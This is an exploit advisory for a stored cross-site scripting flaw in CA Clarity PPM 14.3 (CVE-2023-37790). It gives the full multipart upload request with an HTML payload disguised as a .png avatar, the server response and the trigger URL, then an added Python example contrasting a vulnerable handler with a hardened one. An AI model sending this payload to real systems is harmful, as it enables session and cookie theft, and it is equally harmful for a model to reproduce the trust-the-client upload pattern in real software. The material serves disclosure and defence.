## https://sploitus.com/exploit?id=PACKETSTORM:173508
==================================================================================================================================
# Title : Insufficient input validation in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting attacks.
# Author : Kaizen
# Tested on : Windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64)
# Vendor : https://www.broadcom.com/
# Dork : https://www.broadcom.com/products/software/value-stream-management/clarity
# Affected Product Version : Clarity PPM 14.3.0.298 / Jaspersoft
# CVE Assigned : CVE-2023-37790
==================================================================================================================================
  
POC:

The avatar upload handler stores the client-supplied Content-Type and filename of the multipart file part and later serves the file back with that same Content-Type and an inline Content-Disposition. A file uploaded under a .png filename but with a text/html part header is therefore rendered by the browser as HTML whenever the avatar is viewed, so the payload persists and fires for any user who loads the profile picture.

Header (on the file part): Content-Type: text/html; charset=utf-8

Payload (file body): <body onload=alert(document.cookie)>
  
  
HTTP Request:  
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1  
  
[REDACTED]  
  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo"  
  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"  
Content-Type: text/html; charset=utf-8  
  
<body onload=alert(document.cookie)>  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="superSecretTokenKey"  
  
superSecretTokenValue  
------WebKitFormBoundaryr7Mas24AkgGJH4HE--  
  
  
HTTP Response:  
  
HTTP/1.1 200 OK  
content-disposition: inline;filename="payload.png"  
Content-Type: text/html;charset=utf-8  
Content-Length: 90  
Date: Thu, 06 Jul 2023 07:33:24 GMT  
Connection: close  
Server: CA PPM  
  
<body onload=alert(document.cookie)>  
  
  
  
To trigger the stored XSS, view the uploaded profile picture. The avatar is fetched through union.viewODFFile, which returns the stored Content-Type and inline disposition shown in the response above, e.g.:

https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true
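The following is an added example, not code from the original advisory or from Broadcom's Clarity PPM. It models the upload-and-serve round trip the PoC demonstrates: the multipart body is constructed to match the PoC request (same boundary, field names, filename, part Content-Type and payload), a small parser extracts the file part, and two hypothetical server-side handlers are contrasted. The vulnerable_* pair reproduces the response headers captured above by trusting the client's Content-Type and filename; the hardened_* pair decides the type from the file's magic bytes, discards both client-supplied values, and pins the response with nosniff and a CSP sandbox. All handler names, the IMAGE_MAGIC table and the sample PNG bytes are assumptions made for the example.

```python
"""Added example (not the advisory's or the vendor's code): how the avatar
upload in the PoC is stored and served, vulnerable vs. hardened."""
import re

BOUNDARY = "----WebKitFormBoundaryr7Mas24AkgGJH4HE"   # boundary from the PoC
PAYLOAD = b"<body onload=alert(document.cookie)>"     # payload from the PoC
FILE_FIELD = "avatar_photo_ODF_New_Attachment_File_Name"

# Hypothetical allow-list: file signatures the hardened handler accepts.
# The client-declared Content-Type is never consulted.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": ("image/png", "png"),
    b"\xff\xd8\xff": ("image/jpeg", "jpg"),
    b"GIF87a": ("image/gif", "gif"),
    b"GIF89a": ("image/gif", "gif"),
}


def build_multipart(filename, content_type, data, boundary=BOUNDARY):
    """Construct a multipart/form-data body shaped like the PoC request."""
    b = ("--" + boundary).encode()
    body = b + b'\r\nContent-Disposition: form-data; name="avatar_photo"\r\n\r\n\r\n'
    body += b + (f'\r\nContent-Disposition: form-data; name="{FILE_FIELD}"; '
                 f'filename="{filename}"\r\nContent-Type: {content_type}\r\n\r\n').encode()
    body += data + b"\r\n"
    body += b + b'\r\nContent-Disposition: form-data; name="superSecretTokenKey"\r\n\r\n'
    body += b"superSecretTokenValue\r\n" + b + b"--\r\n"
    return body


def parse_multipart(body, boundary=BOUNDARY):
    """Minimal multipart parser returning [(headers, data), ...].
    Simplified for the example: assumes CRLF line endings and that the
    boundary string never occurs inside a part body."""
    delim = ("--" + boundary).encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter: --boundary--
            break
        chunk = chunk.removeprefix(b"\r\n")  # CRLF that follows the delimiter
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            headers[name.strip().lower()] = value.strip()
        parts.append((headers, data.removesuffix(b"\r\n")))  # CRLF before next delimiter
    return parts


def find_upload(parts):
    """Return (filename, declared Content-Type, bytes) of the avatar file part."""
    for headers, data in parts:
        cd = headers.get("content-disposition", "")
        if re.search(r';\s*name="%s"' % re.escape(FILE_FIELD), cd):
            m = re.search(r';\s*filename="([^"]*)"', cd)
            ctype = headers.get("content-type", "application/octet-stream")
            return (m.group(1) if m else "", ctype, data)
    raise ValueError("no file part in request")


def vulnerable_store(filename, declared_type, data):
    """Models what the advisory shows: the bytes are stored together with the
    client's filename and Content-Type, with no check on the content."""
    return {"filename": filename, "content_type": declared_type, "data": data}


def vulnerable_serve(stored):
    """Echoes the record back verbatim, reproducing the PoC response:
    attacker-chosen Content-Type, inline disposition, no nosniff."""
    headers = {
        "Content-Type": stored["content_type"],
        "Content-Disposition": 'inline;filename="%s"' % stored["filename"],
    }
    return headers, stored["data"]


def hardened_store(filename, declared_type, data):
    """Accepts only bytes carrying a known image signature and discards both
    client-supplied values; type and name are chosen by the server."""
    for magic, (ctype, ext) in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return {"filename": "avatar." + ext, "content_type": ctype, "data": data}
    raise ValueError("rejected: not a supported image (declared %r, name %r)"
                     % (declared_type, filename))


def hardened_serve(stored):
    """Pins the response to the sniffed image type.  nosniff stops the browser
    from second-guessing it; the CSP sandbox is defence in depth, so even an
    HTML body would render with an opaque origin and scripts disabled."""
    headers = {
        "Content-Type": stored["content_type"],
        "Content-Disposition": 'inline; filename="%s"' % stored["filename"],
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    return headers, stored["data"]


if __name__ == "__main__":
    body = build_multipart("payload.png", "text/html; charset=utf-8", PAYLOAD)
    name, ctype, data = find_upload(parse_multipart(body))
    print("vulnerable:", vulnerable_serve(vulnerable_store(name, ctype, data))[0])
    try:
        hardened_store(name, ctype, data)
    except ValueError as err:
        print("hardened:", err)
```

Run stand-alone, the vulnerable path prints the same Content-Type and inline disposition as the captured response, while the hardened path rejects the upload because the bytes do not start with an image signature. When testing an upload endpoint for this class of bug, the check that matters is whether the download response's Content-Type tracks the value you put in the multipart part header; if it does, the server is trusting the client, and a renamed HTML file will be rendered as a document in the application's origin.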